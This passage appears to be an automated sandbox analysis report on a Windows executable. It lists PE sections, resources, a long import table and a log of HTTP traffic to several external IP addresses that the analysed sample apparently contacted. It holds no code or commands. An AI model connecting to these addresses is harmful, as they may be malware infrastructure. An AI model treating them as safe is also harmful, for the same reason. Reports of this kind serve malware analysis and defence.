                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0xc40000x5f3c40x5f400fe3c270a8920a26dfe5ecc9a2167ae68False0.9315791092519685data7.901156727761588IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                    RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                    RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                    RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                    RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                    RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                    RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                    RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                    RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                    RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                    RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                    RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                                                    RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                    RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                    RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                    RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                    RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                    RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                    RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                    RT_RCDATA0xcc7b80x566c9data1.0003276900955669
                                                                                                                    RT_GROUP_ICON0x122e840x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                    RT_GROUP_ICON0x122efc0x14dataEnglishGreat Britain1.25
                                                                                                                    RT_GROUP_ICON0x122f100x14dataEnglishGreat Britain1.15
                                                                                                                    RT_GROUP_ICON0x122f240x14dataEnglishGreat Britain1.25
                                                                                                                    RT_VERSION0x122f380xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                    RT_MANIFEST0x1230140x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                    COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                    USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                    UxTheme.dllIsThemeActive
                                                                                                                    KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                                                    USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                                                    GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                    ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                    OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishGreat Britain

                                                                                                                    Network Behavior

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 21, 2024 16:57:00.646564960 CET4973680192.168.2.4103.21.221.87
                                                                                                                    Nov 21, 2024 16:57:00.766268969 CET8049736103.21.221.87192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:00.766367912 CET4973680192.168.2.4103.21.221.87
                                                                                                                    Nov 21, 2024 16:57:00.777770042 CET4973680192.168.2.4103.21.221.87
                                                                                                                    Nov 21, 2024 16:57:00.897310019 CET8049736103.21.221.87192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:02.433334112 CET8049736103.21.221.87192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:02.433650017 CET8049736103.21.221.87192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:02.433799028 CET4973680192.168.2.4103.21.221.87
                                                                                                                    Nov 21, 2024 16:57:02.436923981 CET4973680192.168.2.4103.21.221.87
                                                                                                                    Nov 21, 2024 16:57:02.556648016 CET8049736103.21.221.87192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:17.710500002 CET4973780192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:17.830339909 CET804973738.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:17.830756903 CET4973780192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:17.845588923 CET4973780192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:17.965187073 CET804973738.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:19.351572990 CET4973780192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:19.430352926 CET804973738.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:19.430377007 CET804973738.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:19.430407047 CET4973780192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:19.430440903 CET4973780192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:19.471144915 CET804973738.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:19.471216917 CET4973780192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:20.370210886 CET4973880192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:20.489927053 CET804973838.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:20.490137100 CET4973880192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:20.503700018 CET4973880192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:20.623260975 CET804973838.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:22.007747889 CET4973880192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:22.023571014 CET804973838.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:22.023634911 CET4973880192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:22.023859024 CET804973838.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:22.023905993 CET4973880192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:22.127521038 CET804973838.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:22.127573013 CET4973880192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:23.026907921 CET4973980192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:23.149878979 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:23.152630091 CET4973980192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:23.170151949 CET4973980192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:23.296596050 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:23.296627045 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:23.296737909 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:23.296767950 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:23.296869993 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:23.296922922 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:23.375363111 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:23.375432014 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:23.375694036 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:24.679651976 CET4973980192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:24.800257921 CET804973938.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:24.800374985 CET4973980192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:25.699487925 CET4974080192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:25.819789886 CET804974038.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:25.820455074 CET4974080192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:25.829682112 CET4974080192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:25.949568033 CET804974038.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:27.409806013 CET804974038.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:27.409876108 CET804974038.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:27.409955978 CET4974080192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:27.412570000 CET4974080192.168.2.438.47.232.124
                                                                                                                    Nov 21, 2024 16:57:27.533186913 CET804974038.47.232.124192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:32.576242924 CET4974280192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:32.698407888 CET8049742199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:32.698504925 CET4974280192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:32.729197025 CET4974280192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:32.850205898 CET8049742199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:33.850008011 CET8049742199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:33.850075960 CET8049742199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:33.850109100 CET8049742199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:33.850146055 CET4974280192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:33.850193024 CET4974280192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:34.243751049 CET4974280192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:35.260984898 CET4974980192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:35.383980036 CET8049749199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:35.384102106 CET4974980192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:35.399979115 CET4974980192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:35.519525051 CET8049749199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:36.527600050 CET8049749199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:36.527705908 CET8049749199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:36.527740002 CET8049749199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:36.527769089 CET4974980192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:36.527803898 CET4974980192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:36.914073944 CET4974980192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:37.932562113 CET4976080192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:38.052752018 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:38.052860975 CET4976080192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:38.067816973 CET4976080192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:38.188147068 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:38.188185930 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:38.188213110 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:38.188240051 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:38.188267946 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:38.188321114 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:38.188348055 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:38.188396931 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:38.188424110 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:39.250854015 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:39.251050949 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:39.251089096 CET8049760199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:39.251117945 CET4976080192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:39.251169920 CET4976080192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:39.570343018 CET4976080192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:40.590082884 CET4976680192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:40.709742069 CET8049766199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:40.709835052 CET4976680192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:40.718899965 CET4976680192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:40.838596106 CET8049766199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:41.897972107 CET8049766199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:41.898050070 CET8049766199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:41.898085117 CET8049766199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:41.898169041 CET4976680192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:41.898169994 CET4976680192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:41.900962114 CET4976680192.168.2.4199.59.243.227
                                                                                                                    Nov 21, 2024 16:57:42.020487070 CET8049766199.59.243.227192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:47.057642937 CET4978280192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:47.177249908 CET8049782146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:47.177472115 CET4978280192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:47.191518068 CET4978280192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:47.311722994 CET8049782146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:48.695280075 CET4978280192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:48.815274954 CET8049782146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:48.815376997 CET4978280192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:49.713998079 CET4978880192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:50.172317982 CET8049788146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:50.172434092 CET4978880192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:50.186734915 CET4978880192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:50.306922913 CET8049788146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:51.495995045 CET8049788146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:51.496144056 CET8049788146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:51.496305943 CET4978880192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:51.695363998 CET4978880192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:52.713917971 CET4979480192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:52.834043980 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:52.834142923 CET4979480192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:52.848275900 CET4979480192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:52.968137980 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:52.968153954 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:52.968178034 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:52.968189955 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:52.968312979 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:52.968381882 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:52.968395948 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:53.034033060 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:53.034091949 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:54.255985022 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:54.256031036 CET8049794146.88.233.115192.168.2.4
                                                                                                                    Nov 21, 2024 16:57:54.256092072 CET4979480192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:54.351557970 CET4979480192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:55.370640039 CET4980080192.168.2.4146.88.233.115
                                                                                                                    Nov 21, 2024 16:57:55.490459919 CET8049800146.88.233.115192.168.2.4
